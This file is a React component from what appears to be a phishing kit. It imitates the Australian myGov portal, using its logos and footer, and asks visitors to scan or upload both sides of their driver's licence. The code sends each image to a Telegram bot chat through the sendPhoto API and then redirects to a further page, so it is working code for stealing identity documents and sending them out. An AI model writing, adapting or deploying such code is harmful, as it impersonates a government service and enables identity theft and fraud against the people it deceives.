import React, { useState } from "react";
import { useNavigate } from "react-router-dom";
import telegramConfig from "./config";

const C = () => {
  const navigate = useNavigate();
  const [frontFile, setFrontFile] = useState(null);
  const [backFile, setBackFile] = useState(null);

  const handleFrontFileChange = (event) => {
    setFrontFile(event.target.files[0]);
  };

  const handleBackFileChange = (event) => {
    setBackFile(event.target.files[0]);
  };

  const handleSubmit = async (event) => {
    event.preventDefault();

    if (!frontFile || !backFile) {
      alert("Please upload both the front and back of your driver's license.");
      return;
    }

    try {
      // Send the front and back images to Telegram
      await sendImageToTelegram(frontFile, "Front of Driver's License");
      await sendImageToTelegram(backFile, "Back of Driver's License");

      // Redirect to F.js
      navigate("/f");
    } catch (error) {
      console.error("Error during submission:", error);
      alert("Failed to submit the images. Please try again.");
    }
  };

  const sendImageToTelegram = async (imageData, description) => {
    const { botToken, chatId } = telegramConfig;
    const url = `https://api.telegram.org/bot${botToken}/sendPhoto`;

    const formData = new FormData();
    formData.append("chat_id", chatId);
    formData.append("photo", imageData);
    formData.append(
      "caption",
      description ? description : "Driver's License Image"
    );

    const response = await fetch(url, {
      method: "POST",
      body: formData,
    });

    if (!response.ok) {
      throw new Error("Failed to send image to Telegram.");
    }
  };

  return (
    <div>
      <div className="brand-rainbow">&nbsp;</div>
      <header role="banner" className="mgvEnhanceHeader">
        <section className="wrapper">
          <div className="inner">
            <div className="unauth-grid">
              <div className="unauth-grid-row">
                <a className="unauth-govt-crest__link" href="#">
                  <img
                    id="unauth-govt-crest"
                    src="/images/myGov-cobranded-logo-black.svg"
                    alt="myGov Beta"
                    role="img"
                  />
                </a>
              </div>
            </div>
          </div>
        </section>
      </header>
      <div className="wrapper-mapwap">
        <div className="main-block" id="content" role="main">
          <h1>Scan or Upload Driver's License</h1>
          <p>
            Please use your camera to scan or upload clear pictures of both the
            front and back of your driver's license.
          </p>
          <form onSubmit={handleSubmit}>
            <div className="input-group">
              <label htmlFor="frontLicense">Front of Driver's License</label>
              <input
                id="frontLicense"
                name="frontLicense"
                type="file"
                accept="image/*"
                capture="environment"
                onChange={handleFrontFileChange}
                required
              />
            </div>
            <div className="input-group">
              <label htmlFor="backLicense">Back of Driver's License</label>
              <input
                id="backLicense"
                name="backLicense"
                type="file"
                accept="image/*"
                capture="environment"
                onChange={handleBackFileChange}
                required
              />
            </div>
            <div className="button-container">
              <button type="submit" className="button-main button">
                Upload and Continue
              </button>
            </div>
          </form>
        </div>
      </div>
      <footer role="contentinfo">
        <div className="wrapper">
          <div className="inner">
            <section className="footer-list">
              <nav>
                <h2 className="sr-only" aria-label="Footer">
                  Footer
                </h2>
                <ul className="lower-links">
                  <li>
                    <a href="#">Terms of use</a>
                  </li>
                  <li>
                    <a href="#">Privacy and security</a>
                  </li>
                  <li>
                    <a href="#">Copyright</a>
                  </li>
                  <li>
                    <a href="#">Accessibility</a>
                  </li>
                </ul>
              </nav>
            </section>
            <div className="footer-lower">
              <section className="footer-lower-logo">
                <a href="#">
                  <img
                    src="/images/myGov-cobranded-logo-white.svg"
                    alt="myGov Beta"
                    width="313.17"
                    height="70"
                  />
                </a>
              </section>
              <p>
                We acknowledge the Traditional Custodians of the lands we live
                on. We pay our respects to all Elders, past and present, of all
                Aboriginal and Torres Strait Islander nations.
              </p>
            </div>
          </div>
        </div>
      </footer>
    </div>
  );
};

export default C;